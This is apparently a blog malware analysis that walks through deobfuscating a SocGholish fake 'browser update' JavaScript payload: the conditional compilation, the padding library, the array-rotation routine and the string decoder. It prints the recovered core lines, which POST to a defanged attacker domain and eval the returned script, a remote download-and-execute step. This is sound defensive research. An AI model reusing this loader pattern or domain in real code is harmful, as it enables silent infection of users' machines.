In the previous post, “SocGholish Series - Part 1”, I examined an infected website which claimed to require a browser update in order to properly function. Users who clicked on the download button would receive a JavaScript file to run on their system which would “update their browser”. I walked through the steps leading up to the download, and in this post will pick up where I left off and delve into the contents of the JavaScript payload.


First Look At The Payload

Cracking the JavaScript download open in SublimeText, I found it to be quite large and crammed together.

[Screenshot: the raw JavaScript download opened in SublimeText]

To make it easier to read, I ran it through an online JS beautifier. It turns out that with the additional newlines and spaces, it is 1,115 lines long.

[Screenshot: the beginning of the beautified payload]

When first looking at this, I saw what I thought were a few JavaScript block comments in the first line. After some Googling, I discovered these comments were actually conditional compilation keywords in JScript, the “Microsoft version” of JavaScript native to Windows. According to some old documentation, conditional compilation allows a script to behave differently depending on the values of the conditional compilation variables. The @cc_on keyword activates conditional compilation support, and the @if and @else keywords function as a standard if/else statement.

The if statement in this sample checks the JScript version on the device. If the version is 4 or greater, execution enters the if statement; otherwise it goes into the very lengthy else statement.
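
For reference, a conditional compilation block has roughly the following shape. This is a minimal sketch and not the sample's actual first line; the variable name branch and its messages are made up for illustration. Engines other than JScript, such as Node, treat the whole block as an ordinary comment, so only the first assignment takes effect there.

```javascript
// Hypothetical illustration of JScript conditional compilation.
var branch = 'not JScript: the block below is just a comment';

/*@cc_on
@if (@_jscript_version >= 4)
    branch = 'JScript 4 or newer: the if branch runs';
@else
    branch = 'JScript older than 4: the else branch runs';
@end
@*/

console.log(branch);
```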

Regarding the else statement - it is over 1,000 lines long and appears somewhat obfuscated. While the obfuscation is not particularly heavy, the process of renaming variables and functions to random characters (as seen in the above screenshot) was continued throughout. To avoid manually deobfuscating 1,000 lines of JavaScript, I opted to take a few strings which didn’t appear to be altered and Google them. Bingo - I found a JavaScript library called Underscore which very closely matches the code in the else statement.

[Screenshot: the Underscore library]

Interesting, why would this be included as part of the downloaded “fake update” JavaScript payload? Scrolling quickly through the code, it does not appear to do anything overtly malicious. Running the code contained in the else statement through any.run doesn’t show any obvious malicious indicators either. All the code in the else statement seems to do is take the Underscore library, turn it into a function, and call the function in-place.

Another factor to weigh is the else statement itself. The Underscore function code is only called if the device is running a JScript version older than 4.0. For reference, JScript version 4.0 was released in the late 1990s. It doesn’t seem likely this payload would find itself on many devices with such an old version of JScript running.

If we consider these two statements to be true:

  • The else section is not malicious (with the caveat that very light analysis was done to prove this)
  • The else section is not likely to ever be entered

a few logical explanations remain regarding the code in the else statement.

  • It was included to increase the size of the download, possibly making it seem more legitimate.
  • The addition of “legitimate” code may have been an attempt at avoiding AV or other detection.
  • The mild obfuscation may have been an attempt to slow down or confuse researchers.

While these are all legitimate possibilities, to be quite honest, I am not sure why the content of the else statement was included. I may be missing something which a more seasoned analyst might have picked up on. Regardless, let’s move on to the content of the if statement, where it seems the action is.

Jumping Into The IF Statement

Below is the original content of the if statement in all its obfuscated glory, structurally beautified for easier reading. This is the section of code which would execute when a victim tried to update their browser by running the Update.js download (and had JScript 4.0 or greater).

[Screenshot: the original, obfuscated content of the if statement]

I worked my way through the content of the if statement in SublimeText, performing text replacement on variables and functions to create more descriptive labels.

[Screenshot: the if statement after renaming variables and functions]

Before I dive into some analysis, I will say I am not a JavaScript guru. In fact, many aspects of JS are a mystery to me. I do a lot of trial and error in Node on my Linux box to try and figure out what certain operators or snippets of code may do. With that said, I may be unable to give the real nitty-gritty technical reason as to why certain statements behaved the way they did, but I will present my best guess based on some testing, Googling, and common sense.

I’m going to jump around a bit, starting with a function toward the bottom on lines 114-120, which I’ve renamed to get_array().

function get_array() {
    var array = [<array_values>];
    get_array = function() {
        return array;
    };
    return get_array();
}

The function starts out by creating an array filled with random strings which appear to be base64 encoded, but don’t decode to anything intelligible when tested manually.
Next, the function redefines itself using something known in JavaScript as the Lazy Function Definition Pattern. To summarize, when the function is called for the first time, it creates and returns the array variable. The next n times the function is called, it only returns the array variable, and it is not recreated each time. If the array is updated in any way, these updates are permanent.
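
The behaviour is easy to confirm in Node with a toy version of the same pattern. This is a minimal sketch: get_letters, build_count, and the three-letter array are made up for illustration and are not part of the sample.

```javascript
var build_count = 0; // counts how often the array is actually created

function get_letters() {
    build_count += 1;
    var letters = ['a', 'b', 'c'];
    // Replace this function with one that only returns the existing array.
    get_letters = function () {
        return letters;
    };
    return get_letters();
}

// Rotate once; the change is made to the single shared array.
get_letters().push(get_letters().shift());

console.log(get_letters()); // [ 'b', 'c', 'a' ]
console.log(build_count);   // 1
```

Even though get_letters() is called three times, the array is only built once, and the rotation is still visible on the last call.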

Moving back to lines 1-47, we find an anonymous, self-invoking function expression. JavaScript allows functions to self-invoke, meaning they are called automatically, immediately after they are defined, with no need for a separate function call. Arguments are passed in via the parentheses immediately following the function definition.

(function(arg_get_array, _0x585212) {
    var strings_object = {
            _0x4e081b: 'gDB%',
            _0x4c3fe3: 0x3f6,
            _0x5f22db: 'PSgS',
            _0x4a3d3f: 0x3ea,
            _0x53d10b: 'YZM3',
            _0x1abe2b: 0x3ed,
            _0x38e02a: 'T^0n',
            _0x2eb8e4: 0x3eb,
            _0x234973: 'XVoi',
            _0x37e27f: 0x3e6,
            _0x6c65c0: 'KcYo',
            _0x259809: 0x3e4,
            _0x1c3c75: 'MW92',
            _0x560688: 0x3df,
            _0x23f8ea: 'YZM3',
            _0x185e90: 0x3dc,
            _0x4a0b3f: '7#tp',
            _0x5af55a: 0x3da,
            _0x50eac5: '$&p#',
            _0x3f2c12: 0x3f8,
            _0x49bff8: 'R6OA',
            _0x540725: 0x3fc
        },
        solo_object = {
            _0x2bd82d: 0x238
        },
        sub_get_array = arg_get_array();

    //passes arg2 minus 568 and arg1 to the deobfuscator() function and returns the result
    function call_deobf(arg1, arg2) {
        return deobfuscator(arg2 - solo_object._0x2bd82d, arg1);
    }

    while (!![]) {
        try {
            var _0x4e9611 = parseInt(call_deobf(strings_object._0x4e081b, strings_object._0x4c3fe3)) / 0x1 * (-parseInt(call_deobf(strings_object._0x5f22db, strings_object._0x4a3d3f)) / 0x2) + parseInt(call_deobf(strings_object._0x53d10b, strings_object._0x1abe2b)) / 0x3 + parseInt(call_deobf(strings_object._0x38e02a, strings_object._0x2eb8e4)) / 0x4 * (-parseInt(call_deobf(strings_object._0x234973, strings_object._0x37e27f)) / 0x5) + parseInt(call_deobf(strings_object._0x6c65c0, strings_object._0x259809)) / 0x6 * (-parseInt(call_deobf(strings_object._0x1c3c75, strings_object._0x560688)) / 0x7) + -parseInt(call_deobf(strings_object._0x23f8ea, strings_object._0x185e90)) / 0x8 + parseInt(call_deobf(strings_object._0x4a0b3f, strings_object._0x5af55a)) / 0x9 + -parseInt(call_deobf(strings_object._0x50eac5, strings_object._0x3f2c12)) / 0xa * (-parseInt(call_deobf(strings_object._0x49bff8, strings_object._0x540725)) / 0xb);
            
            //if result of above = 964931, then break and stop shifting array
            if (_0x4e9611 === _0x585212) break;
            else sub_get_array['push'](sub_get_array['shift']());
        } catch (_0x3f5ce4) {
            sub_get_array['push'](sub_get_array['shift']());
        }
    }
}(get_array, 0xeb943));
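
Stripped of the obfuscation, the self-invoking pattern in the listing above reduces to something like the following sketch. The names iife_result, first_arg, and second_arg are placeholders of my own, not names from the sample.

```javascript
// Hypothetical example: the function runs once, immediately, with 2 and 3 as arguments.
var iife_result = (function (first_arg, second_arg) {
    return first_arg + second_arg;
}(2, 3));

console.log(iife_result); // 5
```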

There are two arguments passed to the anonymous function: the get_array function and the value 0xeb943, which converted from base16 to base10 is 964931.
The first thing the function does is define an object containing a set of key-value pairs. Looking closely at the KVs, they appear to follow a pattern: a random string and then a number in base16.

The function then defines another object with a single key-value pair, whose value is 0x238 in base16, or 568 in base10. Next, the function calls get_array (passed in as an argument) and assigns the returned array to sub_get_array.
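
Both hex conversions can be double-checked in Node. The variable names target_value and offset_value are my own labels for the two constants.

```javascript
var target_value = 0xeb943; // second argument of the self-invoking function
var offset_value = 0x238;   // the single value stored in solo_object

console.log(target_value);               // 964931
console.log(parseInt('eb943', 16));      // 964931
console.log(offset_value);               // 568
console.log((964931).toString(16));      // eb943
```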

After the variable creations are complete, a new function called call_deobf is created. The purpose of call_deobf is to take two arguments, subtract 568 from the second argument, and pass them both to another function, deobfuscator(). The deobfuscator function can be found in the previous screenshot from lines 62-112, and I’ll go into detail regarding it in a separate section. For now, it is enough to know it returns a deobfuscated element from the array defined in get_array.
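
To see what call_deobf actually hands over, the real deobfuscator can be swapped for a stand-in that simply echoes its arguments. This is a sketch under that assumption: deobfuscator_stub, call_deobf_demo, and offset_object are hypothetical names, and the stub does no decoding at all.

```javascript
var offset_object = { _0x2bd82d: 0x238 }; // same offset as solo_object

// Hypothetical stand-in: the real deobfuscator() decodes an array element.
function deobfuscator_stub(numeric_arg, string_arg) {
    return { numeric_arg: numeric_arg, string_arg: string_arg };
}

// Same shape as call_deobf: swap the arguments and subtract the offset.
function call_deobf_demo(arg1, arg2) {
    return deobfuscator_stub(arg2 - offset_object._0x2bd82d, arg1);
}

var demo_result = call_deobf_demo('gDB%', 0x3f6);
console.log(demo_result); // { numeric_arg: 446, string_arg: 'gDB%' }
```

Note the arguments swap places on the way through, and 0x3f6 (1014) minus 568 leaves 446 as the numeric argument.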

Up next, the while loop on line 36. In JavaScript, everything except for a specific list of items (0, -0, null, etc.) is considered “truthy”, meaning considered true when encountered in a boolean context. Thus, in JavaScript [] is truthy, and a double negation of a truthy value is also truthy. Therefore, this is a “while true” loop.

    while (!![]) {
        try {
            var while_breaker = parseInt(call_deobf(array_strings._0x4e081b, array_strings._0x4c3fe3)) / 0x1 * (-parseInt(call_deobf(array_strings._0x5f22db, array_strings._0x4a3d3f)) / 0x2) + parseInt(call_deobf(array_strings._0x53d10b, array_strings._0x1abe2b)) / 0x3 + parseInt(call_deobf(array_strings._0x38e02a, array_strings._0x2eb8e4)) / 0x4 * (-parseInt(call_deobf(array_strings._0x234973, array_strings._0x37e27f)) / 0x5) + parseInt(call_deobf(array_strings._0x6c65c0, array_strings._0x259809)) / 0x6 * (-parseInt(call_deobf(array_strings._0x1c3c75, array_strings._0x560688)) / 0x7) + -parseInt(call_deobf(array_strings._0x23f8ea, array_strings._0x185e90)) / 0x8 + parseInt(call_deobf(array_strings._0x4a0b3f, array_strings._0x5af55a)) / 0x9 + -parseInt(call_deobf(array_strings._0x50eac5, array_strings._0x3f2c12)) / 0xa * (-parseInt(call_deobf(array_strings._0x49bff8, array_strings._0x540725)) / 0xb);
            
            //if result of above == 964931, then break and stop shifting array
            if (while_breaker === _0x585212) break;
            else sub_get_array['push'](sub_get_array['shift']());
        } catch (_0x3f5ce4) {
            sub_get_array['push'](sub_get_array['shift']());
        }
    } 
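
The !![] condition at the top of this loop can be checked directly in Node. The variable names below are only labels for the three intermediate values.

```javascript
var empty_array_is_truthy = Boolean([]); // true: an empty array is still an object
var negated_once = ![];                  // false
var negated_twice = !![];                // true

console.log(empty_array_is_truthy, negated_once, negated_twice); // true false true
```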

Starting in the try statement, the first thing the while loop does is create a variable, while_breaker, whose value is the result of a long, complex series of arithmetic operations and function calls. The following if statement checks to see whether while_breaker is strictly equal to the second argument of the main function, the number 964931.
If they are equal, the while loop breaks and the end of the self-invoked function is reached. If they are not equal, the array removes its first element and passes the element to an invocation of “push” – effectively rotating the array by moving the first element of the array to the end of the array.
If anything in the try statement fails, the array is still shifted in the catch statement.

In effect, the entire purpose of the self-invoked function is to take the array created by get_array and rotate it X number of times. When, and only when, it has been rotated the correct number of times will the while_breaker value be set to 964931 and the while loop break.
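
The same idea on a much smaller scale looks something like this. It is a toy sketch, not the sample's code: toy_checksum, rotate_until_match, and the three-element array are invented for illustration, and unlike the sample's endless loop this version gives up after one full cycle.

```javascript
// Hypothetical checksum: mirrors the parseInt-and-divide style of the sample.
function toy_checksum(list) {
    return parseInt(list[0]) / 0x1 + parseInt(list[1]) / 0x2;
}

// Rotate until the checksum matches; give up after one full cycle.
function rotate_until_match(list, target) {
    var rotations = 0;
    while (rotations < list.length) {
        if (toy_checksum(list) === target) {
            return rotations;
        }
        list.push(list.shift()); // move the first element to the end
        rotations += 1;
    }
    return -1; // no rotation produced the target
}

var toy_array = ['30', '10', '20'];
var rotations_needed = rotate_until_match(toy_array, 20);

console.log(rotations_needed); // 1
console.log(toy_array);        // [ '10', '20', '30' ]
```

Only one ordering of the array produces the target value, so the checksum doubles as a check that the array ended up in the order the rest of the code expects.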

Moving on to the next important piece of the puzzle, the deobfuscator function.

Deobfuscator Function And Beyond

I cleaned and notated the deobfuscator function enough to understand the basic behavior, but I will admit, there are some sections in which I did not spend a lot of time in the weeds. Specifically, the two functions defined within deobfuscator on lines 68 and 80, and their respective for-loops. In this case, it was enough to understand they perform “some action” on the arguments passed to them. No deep dive into the specific for-loop shenanigans necessary.
With that said, I have provided comments as to my understanding of the deobfuscator function in the code screenshot, if interested. The quick and dirty explanation: using the numeric_arg, the function grabs a value from the get_array array. It modifies the array_value variable using a more complex series of functions, and returns a value.

Now we can finally get to the payload finale, the real important stuff – lines 50, 51, 52, and 122.

var activex_object = new ActiveXObject(call_deobf_2('7FM9', 0x2a1) + call_deobf_2('@f0l', 0x2a3));
activex_object[call_deobf_2('@f0l', 0x293)](call_deobf_2('7#tp', 0x28a), call_deobf_2('Yu2X', 0x2a0) + call_deobf_2('Fo89', 0x2ab) + call_deobf_2('HSRT', 0x2a9) + call_deobf_2('jlDe', 0x29f) + call_deobf_2('oRu9', 0x287), ![]), 
activex_object[call_deobf_2('HC5I', 0x285) + call_deobf_2(')X0A', 0x2a7)](call_deobf_2('O)P#', 0x2aa) + call_deobf_2('HSRT', 0x2ac) + call_deobf_2('@9eY', 0x28e), '1');

Starting with the first line, we can see a variable of type ActiveXObject is being created, but the argument passed in is the result of two function calls. How can we determine what this value may be?

Since I know the purposes of the get_array and deobfuscator functions are “benign” (not directly executing malicious code), I can start up a Node REPL (Read-Eval-Print-Loop) session to play with the JavaScript dynamically. To do this, simply enter node in the command prompt, provided Node.js is installed on the device.

Once here, I pasted the two functions into the REPL, as it will save functions for the duration of the session.
Then, I pasted the entire anonymous, self-invoking function into the REPL as well, since I know all it does is rotate the array. Perfect, now all I need to do is paste lines 54-59 (a function which calls deobfuscator, which I named call_deobf_2) into the REPL and I can start manually deobfuscating.

[Screenshot: deobfuscating strings in the Node REPL]

So, now we know line 50 is actually

var activex_object = new ActiveXObject('MSXML2.XMLHTTP')

which is how an XMLHTTP object is created. This object provides client-side protocol support for communication with HTTP servers.

Performing the same steps on the remaining three lines gives (intentionally defanged)

51: activex_object['open']('POST', 'https://e9171.asset.tradingvein[.]xyz/subscribeEvent', ![]), 
52: activex_object['setRequestHeader']('Upgrade-Insecure-Requests', '1');
122: activex_object['send']('0fLZsUtGNjQj6htMDKjCPOqLbq6CaK8DLSt7/ur7qQ=='), this['eval'](activex_object['responseText']);

We’ve done it! Line 51 initializes a synchronous POST request to a new domain, and line 52 sets the Upgrade-Insecure-Requests header to 1, which signals to the server that the client prefers an encrypted and authenticated response. Finally, line 122 sends a base64 encoded string to the domain and executes what is returned in the responseText.
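
The order of the calls and the meaning of the ![] argument can be traced safely with a recorder in place of the real object. This is a sketch only: FakeXmlHttp is a hypothetical stand-in I wrote for Node, it sends nothing over the network, and the URL stays defanged.

```javascript
// Hypothetical recorder standing in for the XMLHTTP object; nothing is sent.
function FakeXmlHttp() {
    this.calls = [];
}
FakeXmlHttp.prototype.open = function (method, url, is_async) {
    this.calls.push(['open', method, url, is_async]);
};
FakeXmlHttp.prototype.setRequestHeader = function (name, value) {
    this.calls.push(['setRequestHeader', name, value]);
};
FakeXmlHttp.prototype.send = function (body) {
    this.calls.push(['send', body]);
};

var fake_request = new FakeXmlHttp();
fake_request['open']('POST', 'https://e9171.asset.tradingvein[.]xyz/subscribeEvent', ![]);
fake_request['setRequestHeader']('Upgrade-Insecure-Requests', '1');
fake_request['send']('0fLZsUtGNjQj6htMDKjCPOqLbq6CaK8DLSt7/ur7qQ==');

console.log(fake_request.calls[0][3]);  // false
console.log(fake_request.calls.length); // 3
```

Since ![] evaluates to false, the third argument to open asks for a blocking request, which is why responseText is already available on the very next statement in the sample.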

Line 122 is the transition into the next stage of infection. The eval statement immediately executes whatever is passed to it, and does so in the context of the current code, meaning any currently declared functions and variables will be usable by the new code. It is safe to assume the responseText will contain more JavaScript.
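
A harmless sketch shows how code handed to eval can reach names that already exist. The sample calls eval as this['eval'] at the top level of the script; this version uses a plain eval call inside a function, which is a simplification, and run_next_stage, already_declared, and existing_helper are all invented names.

```javascript
function run_next_stage(response_text) {
    var already_declared = 'set before eval ran';
    function existing_helper(value) {
        return value.toUpperCase();
    }
    // The evaluated string can use the variable and function declared above.
    return eval(response_text);
}

var stage_output = run_next_stage('existing_helper(already_declared)');
console.log(stage_output); // SET BEFORE EVAL RAN
```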

Summary

When it all boils down, the entire payload could have been written in a handful of lines – the obfuscation techniques and the distracting Underscore library made up the bulk of the payload.

Even though it is not necessary for defense or quick analysis, I enjoy doing deep dives on samples such as these to really understand the inner workings. Chalk it up to perfectionism, but I usually learn quite a few things while doing so, and it is a great way to build up skills.

Unfortunately, I did not execute the payload on my VM so this is as far as I can go for now.
I plan on running through the attack chain once again, but next time taking it a few steps further.
Look for a part three in the future where I will capture and analyze the next phases.